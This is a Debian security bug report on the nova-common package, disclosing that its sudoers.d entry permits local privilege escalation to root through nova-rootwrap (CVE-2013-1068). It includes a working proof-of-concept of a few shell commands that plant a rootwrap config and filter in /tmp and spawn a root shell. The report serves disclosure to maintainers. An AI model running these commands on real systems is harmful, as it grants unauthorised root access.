Package: nova-common Version: 2014.1.1-1 Severity: grave Tags: security, confirmed
After installing nova-common file /etc/sudoers.d/nova-common is created. If /etc/sudoers contains "#includedir /etc/sudoers.d" nova is vulnerable to CVE-2013-1068 local privilege escalation. Vulnerability does not need working OpenStack installation. If I am correct OpenStack does not work without includedir configuration so it might be usually enabled in OpenStack instances. PoC: https://bugs.launchpad.net/ubuntu/+source/nova/+bug/1185019 """ echo [DEFAULT] >/tmp/my-rootwrap.conf echo filters_path=/tmp/my-filters.d >>/tmp/my-rootwrap.conf mkdir /tmp/my-filters.d echo [Filters] >/tmp/my-filters.d/my.filters echo my-shell: CommandFilter, /bin/sh, root >>/tmp/my-filters.d/my.filters sudo nova-rootwrap /tmp/my-rootwrap.conf sh id """ -- System Information: Debian Release: 7.5 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.2.0-4-amd64 (SMP w/8 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF-8) Shell: /bin/sh linked to /bin/dash
signature.asc
Description: Digital signature
